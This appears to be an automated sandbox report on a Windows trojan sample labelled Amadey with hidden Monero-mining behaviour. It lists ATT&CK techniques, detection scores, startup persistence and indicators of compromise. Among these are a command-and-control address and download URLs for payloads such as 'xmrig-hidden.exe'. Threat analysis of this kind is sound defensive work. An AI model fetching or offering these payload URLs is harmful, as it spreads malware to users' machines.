Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	212 Scripting	Valid Accounts	1 Windows Management Instrumentation	212 Scripting	1 DLL Side-Loading	1 Obfuscated Files or Information	OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	911 Process Injection	1 DLL Side-Loading	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	11 Masquerading	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Exploitation for Client Execution	Login Hook	Login Hook	131 Virtualization/Sandbox Evasion	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	11 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Command and Scripting Interpreter	Network Logon Script	Network Logon Script	911 Process Injection	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	3 PowerShell	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
yjYJ8QncaF.exe	66%	Virustotal		Browse
yjYJ8QncaF.exe	61%	ReversingLabs	Win64.Trojan.Amadey
yjYJ8QncaF.exe	100%	Avira	TR/AVI.Agent.gdbhv

Source	Detection	Scanner	Label
http://45.144.21	0%	Avira URL Cloud	safe
http://45.144.212.77:16000	0%	Avira URL Cloud	safe
http://45.144.212.77/	0%	Avira URL Cloud	safe
https://oneget.orgX	0%	Avira URL Cloud	safe
http://45.144.212.	0%	Avira URL Cloud	safe
https://oneget.org	0%	Avira URL Cloud	safe
http://45.144.212.77:16000/setup	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
github.com	140.82.121.3	true	false	high
a-0003.a-msedge.net	204.79.197.203	true	false	high
pool.hashvault.pro	80.240.16.67	true	false	high
objects.githubusercontent.com	185.199.111.133	true	false	high
pastebin.com	172.67.19.24	true	false	high
ax-0001.ax-msedge.net	150.171.27.10	true	false	high
api.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.144.212.77:16000/setup	true	Avira URL Cloud: safe	unknown
https://github.com/letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exe	false		high
https://pastebin.com/raw/i3kvksAW	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://45.144.212.77/	powershell.exe, 00000003.00000002.1820169013.000001D9A5CC2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.1845912601.000001D9B5813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1845912601.000001D9B5956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000004.00000002.1927473773.00000213395A4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.1927473773.0000021339AB0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.1927473773.0000021339AB0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000003.00000002.1820169013.000001D9A6744000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021333708000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.144.212.77:16000	powershell.exe, 00000003.00000002.1820169013.000001D9A59C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1820169013.000001D9A6744000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.1845912601.000001D9B5813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1845912601.000001D9B5956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000004.00000002.1927473773.00000213395A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000003.00000002.1820169013.000001D9A57A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021332AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.144.21	powershell.exe, 00000003.00000002.1820169013.000001D9A5CC2000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.1820169013.000001D9A57A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021332AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.1927473773.0000021339AB0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 00000004.00000002.1927473773.00000213395A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://45.144.212.	powershell.exe, 00000003.00000002.1820169013.000001D9A6744000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.19.24	pastebin.com	United States	13335	CLOUDFLARENETUS	false
80.240.16.67	pool.hashvault.pro	Germany	20473	AS-CHOOPAUS	false
140.82.121.3	github.com	United States	36459	GITHUBUS	false
140.82.121.4	unknown	United States	36459	GITHUBUS	true
45.144.212.77	unknown	Ukraine	47169	HPC-MVM-ASHU	true
185.199.111.133	objects.githubusercontent.com	Netherlands	54113	FASTLYUS	false
192.248.189.11	unknown	France	20473	AS-CHOOPAUS	true
204.79.197.203	a-0003.a-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1630727
Start date and time:	2025-03-06 08:08:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	50
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	yjYJ8QncaF.exe renamed because original name is a hash value
Original Sample Name:	5b3ed060facb9d57d8d0539084686870.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.mine.winEXE@41/42@8/9
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 25 Number of non-executed functions: 39
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209, 52.149.20.212, 20.190.159.131, 13.107.246.60, 20.74.47.205, 20.105.99.58, 2.23.227.215, 20.223.35.26, 150.171.27.10
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, login.live.com, e16604.f.akamaiedge.net, prod.fs.microsoft.com.akadns.net
Execution Graph export aborted for target powershell.exe, PID 7408 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:09:10	API Interceptor	99x Sleep call for process: powershell.exe modified
02:09:33	API Interceptor	363x Sleep call for process: explorer.exe modified
02:10:31	API Interceptor	2x Sleep call for process: svchost.exe modified
07:09:34	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.19.24	rrats.exe	Get hash	malicious	AsyncRAT	Browse	pastebin.com/raw/KKpnJShN
	sys_upd.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_menu..ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm2.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_phshop..ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	VvPrGsGGWH.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	pastebin.com/raw/sA04Mwk2
	HQsitBLlOv.dll	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	xK44OOt7vD.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_hiddenz.ps1	Get hash	malicious	AsyncRAT, XWorm	Browse	pastebin.com/raw/sA04Mwk2
80.240.16.67	mBBBgvD.exe	Get hash	malicious	AsyncRAT, BitCoin Miner, XWorm, Xmrig	Browse
	Microsoft Visual C++ 2015-2019 Redistrid.exe	Get hash	malicious	Xmrig	Browse
	r.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Win64.Evo-gen.10598.15505.exe	Get hash	malicious	Xmrig	Browse
	bioldgefsawe.exe	Get hash	malicious	Xmrig	Browse
	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	Get hash	malicious	Blank Grabber, Njrat, Xmrig	Browse
	lolz.exe	Get hash	malicious	Xmrig	Browse
	9d2h99wrj.exe	Get hash	malicious	Xmrig	Browse
	Solara.exe	Get hash	malicious	Python Stealer, Exela Stealer, Xmrig	Browse
	xmr new.exe	Get hash	malicious	Xmrig	Browse
140.82.121.3	Winscreen.exe	Get hash	malicious	Xmrig	Browse	github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/shell.exe
	stubInf.exe	Get hash	malicious	Xmrig	Browse	github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/Winscreen.exe
	6glRBXzk6i.exe	Get hash	malicious	RedLine	Browse	github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
	firefox.lnk	Get hash	malicious	CobaltStrike	Browse	github.com/john-xor/temp/blob/main/index.html?raw=true
	0XzeMRyE1e.exe	Get hash	malicious	Amadey, Vidar	Browse	github.com/neiqops/ajajaj/raw/main/file_22613.exe
	MzRn1YNrbz.exe	Get hash	malicious	Vidar	Browse	github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
github.com	d5Wai5fIAK.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	140.82.121.4
	downloader.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	https://codeload.github.com/SMSAgentSoftware/ConfigMgr-PXE-Boot-Log/zip/refs/heads/master	Get hash	malicious	Unknown	Browse	140.82.121.10
	svchost.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	Setup.exe	Get hash	malicious	AveMaria, Clipboard Hijacker, StormKitty	Browse	140.82.121.4
	Setup.exe	Get hash	malicious	AveMaria, Clipboard Hijacker, StormKitty	Browse	140.82.121.3
	tresk.exe	Get hash	malicious	Unknown	Browse	140.82.112.3
	ConsoleApplication4.exe	Get hash	malicious	AveMaria, Clipboard Hijacker, StormKitty	Browse	140.82.121.4
	@echo off.bat	Get hash	malicious	XWorm	Browse	140.82.121.3
	https://docs.google.com/presentation/d/e/2PACX-1vSP5XcPJ2CxZRi_aMWj1ncI-XfY7WDBREj5DcuUNYZ0utEzQihTwp_09fWq2KETAmkKt8NC3E04vQkm/pub?start=false&loop=false&delayms=3000#slide=id.p	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	140.82.121.3
pool.hashvault.pro	mBBBgvD.exe	Get hash	malicious	AsyncRAT, BitCoin Miner, XWorm, Xmrig	Browse	80.240.16.67
	Microsoft Visual C++ 2015-2019 Redistrid.exe	Get hash	malicious	Xmrig	Browse	80.240.16.67
	SecuriteInfo.com.Win32.Backdoor.Rozena.62P92R.11698.31770.exe	Get hash	malicious	Xmrig	Browse	80.240.16.67
	r.exe	Get hash	malicious	Xmrig	Browse	192.248.189.11
	SecuriteInfo.com.Win64.Evo-gen.10598.15505.exe	Get hash	malicious	Xmrig	Browse	80.240.16.67
	SecuriteInfo.com.FileRepMalware.18792.6243.exe	Get hash	malicious	Xmrig	Browse	192.248.189.11
	bioldgefsawe.exe	Get hash	malicious	Xmrig	Browse	80.240.16.67
	random.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, RedLine, Vidar, XWorm, Xmrig	Browse	192.248.189.11
	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	Get hash	malicious	Blank Grabber, Njrat, Xmrig	Browse	192.248.189.11
	NKtd6GRqI1.exe	Get hash	malicious	DCRat, PureLog Stealer, Xmrig, zgRAT	Browse	80.240.16.67
a-0003.a-msedge.net	q3na5Mc.exe	Get hash	malicious	Vidar	Browse	204.79.197.203
	09.msi	Get hash	malicious	RedLine	Browse	204.79.197.203
	95.msi	Get hash	malicious	RedLine	Browse	204.79.197.203
	ESVoO7ywn5.exe	Get hash	malicious	Vidar	Browse	204.79.197.203
	prog.exe	Get hash	malicious	Azorult, Ramnit	Browse	204.79.197.203
	bin2.exe	Get hash	malicious	AZORult, Ramnit	Browse	204.79.197.203
	Gadomancy.exe	Get hash	malicious	Unknown	Browse	204.79.197.203
	SecuriteInfo.com.Trojan.Inject5.17530.4675.11921.exe	Get hash	malicious	Unknown	Browse	204.79.197.203
	SecuriteInfo.com.Trojan.Inject5.17530.4675.11921.exe	Get hash	malicious	Unknown	Browse	204.79.197.203
	xn3nGSFdRn.exe	Get hash	malicious	Vidar	Browse	204.79.197.203
objects.githubusercontent.com	d5Wai5fIAK.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.199.108.133
	svchost.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	https://docs.google.com/presentation/d/e/2PACX-1vSP5XcPJ2CxZRi_aMWj1ncI-XfY7WDBREj5DcuUNYZ0utEzQihTwp_09fWq2KETAmkKt8NC3E04vQkm/pub?start=false&loop=false&delayms=3000#slide=id.p	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	185.199.110.133
	FbgvXTTJlW.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	random.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	185.199.110.133
	https://atpscan.global.hornetsecurity.com/?d=eqOz7AXSzN2V2mi6iPmcWAtgYiZy7lkNff2rdLiYxLc&f=uieQKeFt6Zo7ANK8iLoZFPTujO3kkK4boT32m0sSAem2yjB3nbrJPC-bjAvICoGvUsBPae9KnS3shx7u3k2FiwwIqyiK3sQzLKFz5y8q_nj8PAt_J9HmT1bo5p4OIPC1eZYzpGJBfTb7UM-l94hwhA&i=&k=WFad&m=2x6lr8WIArfjoki1cLDoaGvtZnic1YOh--dHqhZnxNrDJUG4m82-vM5qXqDCSAsURkVh0fd5KOJuBllo3N6JKs2ra2-P7_2temJ9tYhs2hxglgVJVr5gYlT_yoYeRZjF&n=GP4DG9iGvMhGp7Cc0MfzdFVrVHv5htxygQbtVpxMJpUIBpkiFZSL5KiAfQBsE-KAVBPk5S1ARYk-3VQUbSVQ7A&r=WVGLAKs8L0Zh9eoU1fbnSHa5iJ0XuA-IG_TRldcDEATEV5Ai8mKQZHV2Y3yODQ5K&s=49438b7fe2a6d5a79aafcc5ab0730c0b326ba1d8858947a63aac81e1e9547b97&u=https%3A%2F%2Faws.predictiveresponse.net%2Ffwdhs.htm%3Fredirect%3D%2F%2FmembersGelita.cpmeduca.com.br	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	185.199.110.133
	random.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, Tofsee, Vidar, zgRAT	Browse	185.199.108.133
	https://github.com/ravendevteam/talon/releases/download/v1.1.3/talon.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	microsoft-update.bat	Get hash	malicious	Unknown	Browse	185.199.110.133
	https://github.com/Tautulli/Tautulli/releases/download/v2.15.1/Tautulli-windows-v2.15.1-x64.exe	Get hash	malicious	Unknown	Browse	185.199.108.133

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	EHYt5mSeeM.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	Kontrakt-pdf.bat.exe	Get hash	malicious	GuLoader	Browse	104.21.112.1
	.deveba=.svg	Get hash	malicious	HTMLPhisher	Browse	104.21.112.1
	PI 00928292828.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	http://www.creditsafe.com/us/en.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	1isequal9.i486.elf	Get hash	malicious	Unknown	Browse	198.41.197.97
	Latsco com_DocuSign_399333177498313234326931502391571054649119654915079225oZtxEvcddgRXCDTmTgDN.html	Get hash	malicious	Unknown	Browse	1.1.1.1
	Real.zip	Get hash	malicious	Unknown	Browse	104.16.123.96
	Korea Customs Document.html	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	miri.hazan_Wednesday, March 05, 2025.pdf	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	104.17.25.14
AS-CHOOPAUS	cbr.arm.elf	Get hash	malicious	Mirai	Browse	204.80.129.89
	i686.elf	Get hash	malicious	Mirai	Browse	167.179.75.251
	mips.elf	Get hash	malicious	Unknown	Browse	141.164.52.211
	Setup.exe	Get hash	malicious	Unknown	Browse	209.222.21.115
	Setup.exe	Get hash	malicious	Unknown	Browse	209.222.21.115
	Setup.exe	Get hash	malicious	Unknown	Browse	209.222.21.115
	morte.mips.elf	Get hash	malicious	Unknown	Browse	45.32.242.115
	morte.mpsl.elf	Get hash	malicious	Unknown	Browse	44.175.72.203
	morte.ppc.elf	Get hash	malicious	Unknown	Browse	44.175.18.154
	yakov.sh4.elf	Get hash	malicious	Unknown	Browse	44.174.57.194
GITHUBUS	d5Wai5fIAK.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	140.82.121.4
	downloader.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	https://codeload.github.com/SMSAgentSoftware/ConfigMgr-PXE-Boot-Log/zip/refs/heads/master	Get hash	malicious	Unknown	Browse	140.82.121.10
	svchost.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	Setup.exe	Get hash	malicious	AveMaria, Clipboard Hijacker, StormKitty	Browse	140.82.121.4
	Setup.exe	Get hash	malicious	AveMaria, Clipboard Hijacker, StormKitty	Browse	140.82.121.3
	tresk.exe	Get hash	malicious	Unknown	Browse	140.82.112.3
	ConsoleApplication4.exe	Get hash	malicious	AveMaria, Clipboard Hijacker, StormKitty	Browse	140.82.121.4
	@echo off.bat	Get hash	malicious	XWorm	Browse	140.82.121.3
	https://docs.google.com/presentation/d/e/2PACX-1vSP5XcPJ2CxZRi_aMWj1ncI-XfY7WDBREj5DcuUNYZ0utEzQihTwp_09fWq2KETAmkKt8NC3E04vQkm/pub?start=false&loop=false&delayms=3000#slide=id.p	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	140.82.121.3
GITHUBUS	d5Wai5fIAK.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	140.82.121.4
	downloader.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	https://codeload.github.com/SMSAgentSoftware/ConfigMgr-PXE-Boot-Log/zip/refs/heads/master	Get hash	malicious	Unknown	Browse	140.82.121.10
	svchost.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	Setup.exe	Get hash	malicious	AveMaria, Clipboard Hijacker, StormKitty	Browse	140.82.121.4
	Setup.exe	Get hash	malicious	AveMaria, Clipboard Hijacker, StormKitty	Browse	140.82.121.3
	tresk.exe	Get hash	malicious	Unknown	Browse	140.82.112.3
	ConsoleApplication4.exe	Get hash	malicious	AveMaria, Clipboard Hijacker, StormKitty	Browse	140.82.121.4
	@echo off.bat	Get hash	malicious	XWorm	Browse	140.82.121.3
	https://docs.google.com/presentation/d/e/2PACX-1vSP5XcPJ2CxZRi_aMWj1ncI-XfY7WDBREj5DcuUNYZ0utEzQihTwp_09fWq2KETAmkKt8NC3E04vQkm/pub?start=false&loop=false&delayms=3000#slide=id.p	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	140.82.121.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Upd#U0430te.js	Get hash	malicious	Unknown	Browse	204.79.197.203
	B4GfvCkDS6.exe	Get hash	malicious	Meduza Stealer	Browse	204.79.197.203
	TT COPY PAYMENT.exe	Get hash	malicious	Remcos, GuLoader	Browse	204.79.197.203
	setup.exe	Get hash	malicious	Unknown	Browse	204.79.197.203
	Update.js	Get hash	malicious	Unknown	Browse	204.79.197.203
	Zahlung.exe	Get hash	malicious	GuLoader, Remcos	Browse	204.79.197.203
	30241696_001.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	204.79.197.203
	doc2024PO20122024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	204.79.197.203
	Zahlung.exe	Get hash	malicious	GuLoader, Remcos	Browse	204.79.197.203

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3073403888921744
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr4:KooCEYhgYEL0In
MD5:	A6127571599EAC835E19D6502718A44E
SHA1:	23295C1C70310F76337B3013137A68A053C14226
SHA-256:	8FE51FC9E30D7B5D4A671A74B838E2080573DDC450E3443B81C631518C5AEABF
SHA-512:	10090B6F6A9B8CE66ED87993D609DC9404AEF0C53A6EF2DB158B252AB278581BBA41620ED6AC74709DF972BF54B9A5DA80DFC1CF096E04DD534DC671D977E6BA
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x4f227673, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42209437408727546
Encrypted:	false
SSDEEP:	1536:hSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:haza/vMUM2Uvz7DO
MD5:	2668F130E40C214E4073A58E4258FC7F
SHA1:	EE75961FE25C8EAD3182A7027D384AC26C96E98B
SHA-256:	CFC9443CAA036A6BA13DC6F5811C728725F2CF8E2FE5EE84A37D5CB0BCA783FB
